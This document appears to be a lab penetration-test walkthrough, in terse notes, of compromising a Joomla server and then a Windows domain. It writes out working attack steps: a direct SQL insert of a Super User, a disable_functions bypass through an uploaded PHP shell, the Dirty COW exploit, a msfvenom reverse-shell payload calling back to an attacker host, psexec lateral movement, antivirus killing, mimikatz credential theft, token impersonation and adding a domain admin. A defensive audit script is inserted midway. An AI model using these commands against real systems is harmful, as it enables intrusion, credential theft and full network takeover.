Information gathering
testuser / cvcvgjASD!@
Brute force failed
Database login succeeded
Joomla CMS public vulnerability
mysql -uroot -p123 -h 192.168.1.110
INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
Account and password: admin2:secret
Login succeeded
disable_functions is enabled
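As an added defensive example (not from the original writeup), the following Python check audits a Joomla users table for Super User (group 8) accounts that were not created through the admin interface, which catches rows shaped like the admin2 insert above. The sample rows are constructed, and the empty-params plus identical-timestamp heuristic is an assumption, not documented Joomla behaviour.

```python
"""Audit Joomla user rows for Super Users created outside the admin flow.
Added defensive example, not part of the original writeup; rows are
constructed and the heuristics below are assumptions."""
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, List, Set, Tuple

SUPER_USERS_GROUP_ID = 8  # default id of Joomla's "Super Users" group

@dataclass
class JoomlaUser:
    # Subset of the #__users columns (table prefix am2zu_ on this host)
    id: int
    username: str
    params: str
    register_date: datetime
    last_visit_date: datetime
    last_reset_time: datetime

def suspicious_super_users(users: Iterable[JoomlaUser],
                           group_map: Iterable[Tuple[int, int]],
                           approved: Set[str]) -> List[str]:
    """Flag Super Users not on the approved list, or whose row looks like a
    direct SQL insert: empty params and registerDate == lastvisitDate ==
    lastResetTime, the pattern that NOW(), NOW(), NOW() leaves behind."""
    super_ids = {uid for uid, gid in group_map if gid == SUPER_USERS_GROUP_ID}
    flagged = []
    for u in users:
        if u.id not in super_ids:
            continue
        scripted = (u.params == "" and
                    u.register_date == u.last_visit_date == u.last_reset_time)
        if u.username not in approved or scripted:
            flagged.append(u.username)
    return flagged

def audit_constructed_sample() -> List[str]:
    """Constructed rows: a legitimate admin, an account inserted straight into
    the database, and an ordinary registered user (group 2)."""
    t = datetime(2020, 7, 23, 10, 0, 0)
    users = [
        JoomlaUser(42, "admin", "{}", datetime(2019, 3, 1, 9, 0),
                   datetime(2020, 7, 1, 8, 30), datetime(2019, 3, 1, 9, 0)),
        JoomlaUser(43, "admin2", "", t, t, t),
        JoomlaUser(44, "testuser", "{}", datetime(2020, 1, 5, 12, 0),
                   datetime(2020, 6, 2, 7, 15), datetime(2020, 1, 5, 12, 0)),
    ]
    group_map = [(42, SUPER_USERS_GROUP_ID), (43, SUPER_USERS_GROUP_ID), (44, 2)]
    return suspicious_super_users(users, group_map, approved={"admin"})
```

Run the audit periodically against a dump of `#__users` and `#__user_usergroup_map`; any username it returns deserves a look at the web and database logs around its registerDate.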
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
Upload the files
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
adduser wwwuser
passwd wwwuser_123Aqx
Remote login
File upload
[wwwuser@localhost tmp]$ chmod 777 linux-exploit-suggester.sh
[wwwuser@localhost tmp]$ ./linux-exploit-suggester.sh
Based on the kernel version
Download locally, then upload the file
gcc -pthread 40839.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ chmod 777 dirty
[wwwuser@localhost tmp]$ rm -rf passwd.bak
[wwwuser@localhost tmp]$ ./dirty 123.com
[wwwuser@localhost tmp]$ mv /tmp/passwd.bak /etc/passwd
su firefart 123.com
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.128 lport=441 -f elf > 1.elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 441
msf5 exploit(multi/handler) > run
run autoroute -s 192.168.93.0/24
run autoroute -p
Host discovery
use auxiliary/scanner/discovery/arp_sweep
set rhosts 192.168.93.1/24
set threads 10
run
msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.1/24
msf5 auxiliary(scanner/smb/smb_version) > run
Brute-force the password
Log in to host .20
msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf5 exploit(windows/smb/psexec) > run
View processes
Migrate process
getpid
run post/windows/manage/migrate
Use the sysinfo command to view the target's system information
The route command shows the full network configuration
run post/windows/manage/killav disables the system's antivirus software
run post/windows/gather/enum_logged_on_users lists the users currently logged on to the target
run post/windows/gather/enum_applications lists the applications installed on the system
Use run windows/gather/credentials/windows_autologin to grab the auto-logon username and password
load mimikatz
kerberos
msv
use incognito # help incognito shows the help
list_tokens -u # list the available tokens
impersonate_token 'NT AUTHORITY\SYSTEM' # impersonate the SYSTEM token
or impersonate_token NT AUTHORITY\\SYSTEM # without single quotes the backslash must be escaped as \\
execute -f cmd.exe -i -t # -t runs the process with the impersonated token
or simply run shell
rev2self # revert to the original token
Found that TEST\administrator is a domain admin account
Add an account
meterpreter > rev2self
meterpreter > add_user bing 1234.com -h 192.168.93.10
meterpreter > add_group_user "Domain Admins" bing -h 192.168.93.10
net use \\192.168.93.10\ipc$ 1234.com /user:TEST\bing
dir \\192.168.93.10\c$
References
http://yugod.xmutsec.com/index.php/2020/07/23/90.html
https://www.cnblogs.com/Yang34/p/11407274.html
https://www.jianshu.com/p/dc7f42ef056f
https://xz.aliyun.com/t/2536
https://www.jianshu.com/p/df72d1ee1e3e